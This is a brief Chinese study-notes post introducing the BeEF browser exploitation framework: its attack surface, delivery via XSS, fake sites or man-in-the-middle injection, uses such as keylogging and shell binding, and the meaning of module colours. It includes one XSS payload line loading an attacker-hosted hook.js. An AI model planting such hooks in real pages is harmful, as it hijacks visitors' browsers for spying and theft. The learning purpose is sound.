Kali linux 学习笔记(五十四)Web渗透——beef 2020.3.30

前言

本节学习beef
在此做些简单的介绍
安装和使用可以参考
https://www.cnblogs.com/xuanhun/p/4203143.html

1、beef简介

Beef
browser exploitation framework

  • 生成、交付 paylaod
  • Ruby 语言编写
  • 服务器端:管理 hooked 客户端
  • 客户端:运行与客户端浏览器的 Javascript 脚本(hook)

浏览器攻击面

  • 应用普遍转移到 B/S 架构,浏览器成为统一客户端程序
  • 结合社火工程学方法对浏览器进行攻击
  • 攻击浏览器该用户
  • 通过注入的 JS 脚本,利用浏览器攻击其他网站

攻击手段

  • 利用往回走拿 xss 漏洞实现攻击
  • 诱使客户端访问含有 hook 的伪造站点
  • 结合中间人攻击注入 hook 脚本

常见用途

  • 键盘记录器
  • 网络扫描
  • 浏览器信息收集
  • 绑定 shell
  • 与 metasploit 集成

2、XSS攻击

启动beef

<script src="http://192.168.1.102:3000/hook.js"></script> #IP是kali的

命令模块

  • 绿色模块:表示模块适合目标浏览器,并且执行结果对客户端不可见
  • 红色模块:表示模块不适用与当前用户,有些红色模块也可以正常执行
  • 橙色模块:模块可用,但结果对用户可见(CAM 弹窗申请权限)
  • 灰色模块:模块未在目标浏览器上测试过

结语

安装在开头有博文可参考
使用是GUI见面可自己摸索
主要是能节省很多码代码的时间

你可能感兴趣的:(kali,linux)